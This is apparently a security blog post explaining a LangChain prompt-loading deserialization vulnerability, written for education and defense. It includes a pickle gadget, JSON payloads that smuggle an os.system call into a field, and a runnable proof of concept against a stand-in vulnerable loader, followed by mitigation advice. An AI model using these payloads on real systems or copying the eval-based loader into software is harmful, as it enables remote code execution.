LangChain is a popular open-source framework for developing applications powered by large language models (LLMs). In June 2023, a critical vulnerability – CVE-2023-36281 – was discovered in version 0.0.171 that allows remote attackers to execute arbitrary code simply by loading a crafted JSON file with the load_prompt method.

This post breaks down this vulnerability in simple terms, provides example code, and explains how attackers can exploit it.

What is the Vulnerability?

LangChain's load_prompt function is designed to help developers import prompt templates from files (including JSON). In the affected versions, this function uses unsafe dynamic features like Python's __subclasses__ and eval to reconstruct objects based solely on the data in the JSON file.

If an attacker can supply a JSON file with specially crafted content, LangChain may trust that JSON and execute arbitrary code on your server. This flaw stems from unsafe deserialization, a common bug class where "loading" data can turn into "running code" if the system is careless.
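A classic illustration of this bug class uses Python's own pickle module (unrelated to LangChain, purely to show the pattern):

import os
import pickle

class Evil:
    def __reduce__(self):
        # Tells pickle how to "rebuild" this object on load: call os.system
        return (os.system, ("touch /tmp/pickle_pwned",))

data = pickle.dumps(Evil())
pickle.loads(data)  # "loading" the data runs the command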

Let's look at a simplified version of what might happen inside load_prompt:

import json

def load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    # DANGER: dynamically selecting a class by name from every subclass of
    # object, then instantiating it with attacker-controlled kwargs
    clazz = [cls for cls in object.__subclasses__()
             if cls.__name__ == config["class"]][0]
    return clazz(**config["kwargs"])

The object.__subclasses__() call retrieves all subclasses of Python's base object class — including dangerous ones like os._wrap_close, which could potentially be abused for code execution. An attacker can specify class and kwargs in the JSON so that the application ends up executing attacker-supplied code.

NOTE: This is a simplified example, but it captures the core issue.
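To see why this is so dangerous, you can enumerate these subclasses yourself (a quick illustration; the exact classes available depend on what your interpreter has already imported):

import os, warnings  # importing these registers their classes as subclasses of object

# Any class an attacker can name by string becomes a candidate "gadget"
gadgets = [c for c in object.__subclasses__()
           if c.__name__ in ("catch_warnings", "_wrap_close")]
print(gadgets)  # e.g. [<class 'warnings.catch_warnings'>, <class 'os._wrap_close'>]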

The attacker crafts a JSON file like this:

{
  "class": "warning",
  "kwargs": {
    "message": "__import__('os').system('touch /tmp/pwned')",
    "category": "UserWarning"
  }
}

If the application uses eval or similar techniques to "reconstruct" objects from this JSON, the malicious payload __import__('os').system('touch /tmp/pwned') will execute on the server when this file is loaded.
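In isolation, the unsafe step boils down to something like this (illustrative, not the literal library code):

payload = "__import__('os').system('touch /tmp/pwned')"
eval(payload)  # evaluating the attacker's string runs the shell command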

Here's an end-to-end Python demo showing how the vulnerability can be abused:

import json

# Malicious JSON payload: "module" holds a Python expression the unsafe loader will evaluate
malicious_json = '''
{
  "class": "catch_warnings",
  "kwargs": {
    "record": false,
    "module": "__import__('os').system('touch /tmp/hacked')"
  }
}
'''

with open("malicious_prompt.json", "w") as f:
    f.write(malicious_json)

# Simplified stand-in for the unsafe loading logic in affected versions
def vulnerable_load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    cls = [c for c in object.__subclasses__()
           if c.__name__ == config["class"]][0]
    # Insecure: eval()-ing attacker-controlled strings before passing them as kwargs
    kwargs = {k: eval(v) if isinstance(v, str) else v
              for k, v in config["kwargs"].items()}
    return cls(**kwargs)

# Loading the file executes the attacker's system command
vulnerable_load_prompt("malicious_prompt.json")

Running this code will create a file /tmp/hacked on the system, proving the attack worked and arbitrary code was run.
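If you try this in a sandbox, you can verify the result and clean up afterwards (hypothetical housekeeping, not part of the PoC itself):

import os

assert os.path.exists("/tmp/hacked")  # the payload ran
os.remove("/tmp/hacked")
os.remove("malicious_prompt.json")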

References

- GitHub Advisory: GHSA-2jgw-mphw-4rg9
- MITRE CVE Database: CVE-2023-36281
- LangChain changelog with fix (v0.0.172)

Who’s At Risk?

- Anyone running LangChain ≤ 0.0.171 and letting users upload, supply, or modify prompt configs (JSON or YAML). You can check your installed version with the snippet below.
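A quick way to check which version you're running:

# Prints the installed LangChain version; anything <= 0.0.171 is affected
from importlib.metadata import version
print(version("langchain"))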

How to Protect Yourself

1. Upgrade Immediately: Update to LangChain v0.0.172 or later, which patches this bug.

2. Never Trust User Templates: Even in new versions, don’t load arbitrary templates from unknown users.
3. Audit Custom Loading Code: If you have custom prompt-loading logic, make sure you don't use __subclasses__, eval, or similar dynamic features on user data (a safer pattern is sketched after this list).
4. Deploy AppArmor, Seccomp, etc.: Add defense-in-depth by restricting what your Python process can do.
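Here's a minimal sketch of a safer loader, assuming you control the set of prompt types that may be instantiated (PromptTemplate here is a stand-in class for illustration, not the LangChain one):

import json

class PromptTemplate:
    def __init__(self, template):
        self.template = template

# Only explicitly allowlisted classes can ever be instantiated
ALLOWED_CLASSES = {"PromptTemplate": PromptTemplate}

def safe_load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    cls = ALLOWED_CLASSES.get(config["class"])
    if cls is None:
        raise ValueError(f"Refusing to load unknown class: {config['class']!r}")
    # kwargs are passed through as plain data; nothing is eval()'d
    return cls(**config["kwargs"])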

Final Words

CVE-2023-36281 is a textbook example of why you should never blindly load or reconstruct Python objects from user data — especially when using features like __subclasses__ and eval.

If you use LangChain in production, immediately upgrade and audit your templates. For further reading, check the original GitHub advisory.

Timeline

Published on: 08/22/2023 19:16:36 UTC
Last modified on: 11/17/2023 19:15:08 UTC